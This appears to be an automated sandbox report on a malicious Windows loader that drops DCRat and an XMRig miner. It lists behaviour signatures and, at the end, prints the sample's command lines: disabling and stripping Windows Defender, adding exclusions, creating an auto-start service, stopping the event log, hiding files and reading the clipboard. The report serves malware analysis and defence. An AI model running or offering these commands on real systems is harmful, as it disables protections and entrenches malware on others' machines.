Analysis Overview
SHA256
7454fcc2c2c9e1b2c9ea16874d70fbfcfdf7823f4ed79d91e6dfbdeadc47d88b
Threat Level: Known bad
The file LunoLoader_pixelplanet.fun.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Process spawned unexpected child process
Xmrig family
Dcrat family
DcRat
DCRat payload
XMRig Miner payload
Creates new service(s)
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Stops running service(s)
Clipboard Data
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Obfuscated Files or Information: Command Obfuscation
Power Settings
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
UPX packed file
Hide Artifacts: Hidden Files and Directories
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Browser Information Discovery
Uses Volume Shadow Copy service COM API
Modifies data under HKEY_USERS
Runs ping.exe
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Detects videocard installed
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Gathers system information
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-12 18:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-12 18:01
Reported
2024-11-12 18:02
Platform
win11-20241007-en
Max time kernel
53s
Max time network
53s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Xmrig family
xmrig
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe | N/A |
| N/A | N/A | C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| N/A | N/A | C:\Recovery\WindowsRE\wininit.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI20042\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2844 set thread context of 1392 | N/A | C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe | C:\Windows\system32\conhost.exe |
| PID 2844 set thread context of 1984 | N/A | C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe | C:\Windows\system32\conhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Media Player\fr-FR\dllhost.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Windows Media Player\fr-FR\5940a34987c991 | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\cmd.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\dotnet\shared\Microsoft.NETCore.App\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\loc\System.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\loc\System.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\loc\27d1bcfc3c54e0 | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\fr-FR\OfficeClickToRun.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Windows\fr-FR\e6c9b481da804f | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| File created | C:\Windows\CSC\powershell.exe | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\conhost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Recovery\WindowsRE\wininit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe
"C:\Users\Admin\AppData\Local\Temp\LunoLoader_pixelplanet.fun.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sigmasoft3.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\fK1YYsKuG.vbe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a.exe"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XLZQHCLS"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XLZQHCLS" binpath= "C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XLZQHCLS"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\ProgramData\oaocofwmfjha\gmstcccpdzbb.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
conhost.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\TPw4JEK.bat" "
C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe
"C:\Users\Admin\AppData\Roaming\reviewDriverintodhcp\WinRuntime.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss-a2.exe'
C:\Windows\system32\attrib.exe
